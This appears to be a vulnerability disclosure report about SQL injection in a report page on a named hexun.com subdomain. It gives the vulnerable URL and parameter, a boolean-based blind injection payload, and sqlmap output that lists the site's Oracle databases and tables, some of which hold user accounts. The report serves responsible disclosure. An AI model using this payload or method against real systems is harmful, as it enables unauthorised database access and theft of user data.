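2015-07-09: Details reported to the vendor; awaiting vendor handling
2015-07-09: Vendor confirmed; details disclosed only to the vendor
2015-07-19: Details disclosed to core white hats and experts in related fields
2015-07-29: Details disclosed to regular white hats
2015-08-08: Details disclosed to intern white hats
2015-08-23: Details disclosed to the public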
Please call me Security Peter Pan (安全小飞侠), thanks!
http://baidu.hexun.com/report/ifread.php?t=1&id=617695
Injection parameter: id

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 81 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://baidu.hexun.com:80/report/ifread.php?t=1&id=617695 AND 7598=7598
---
[16:04:00] [INFO] testing MySQL
[16:04:01] [WARNING] the back-end DBMS is not MySQL
[16:04:01] [INFO] testing Oracle
[16:04:01] [INFO] confirming Oracle
[16:04:02] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
available databases [9]:
[*] BDFIN
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] REPDBO
[*] SYS
[*] SYSTEM
[*] WMSYS
+------------------------+----------+
| Table                  | Entries  |
+------------------------+----------+
| FUTURES_QUOTE          | 26984041 |
| R_STOCKS_SECTOR        | 3604361  |
| TB_HJ_TTJ              | 2477437  |
| TB_STOCK_BOARD         | 2215113  |
| VOTE                   | 2186237  |
| TB_SGE_QUOTE           | 1463523  |
| TB_METAL_QUOTE         | 1438797  |
| USA_STOCK_QUOTE_TMP    | 1067821  |
| R_INFO_O               | 1029189  |
| TB_STOCK_BOARD_INDEX   | 865135   |
| R_INFO                 | 597134   |
| TB_TJS_FS              | 525422   |
| TB_METAL_QUOTE_FX678   | 497540   |
| CS_TNCONT              | 152035   |
| TB_STOCK_BOARD_MONITOR | 64100    |
| USA_STOCK_QUOTE        | 48146    |
| TB_SW_HQ               | 25045    |
| CODE_INFO              | 22329    |
| STOCK_BOARD            | 4311     |
| STOCK_BOARD_MONITOR    | 4295     |
| R_STOCK                | 4225     |
| R_INFO_2               | 3970     |
| TB_TJS_K               | 2012     |
| R_SECTOR_TDX           | 1986     |
| VOTE_MI                | 925      |
| R_GRADE                | 645      |
| USA_STOCK_CODE         | 442      |
| R_INDUSTRY             | 345      |
| CT_USERINFO            | 289      |
| TRADINFO               | 270      |
| CS_TNCONT_NEW          | 209      |
| R_INSCODE              | 146      |
| R_SECTOR               | 134      |
| CS_TNCONF              | 123      |
| MEMBER_STOCKS          | 43       |
| FUTURES_CODE           | 27       |
| AD_KB                  | 26       |
| TEST                   | 25       |
| MEMBER_STOCK_TRADE     | 13       |
| MEMBER_STOCK_GROUPS    | 11       |
| RP_TEST                | 9        |
| ACCOUNT                | 6        |
| REPORT_USER_ACCOUNT    | 5        |
+------------------------+----------+
You know the drill, fix it as soon as possible.
Severity: High
Vulnerability Rank: 15
Confirmed at: 2015-07-09 17:33
Thanks
None yet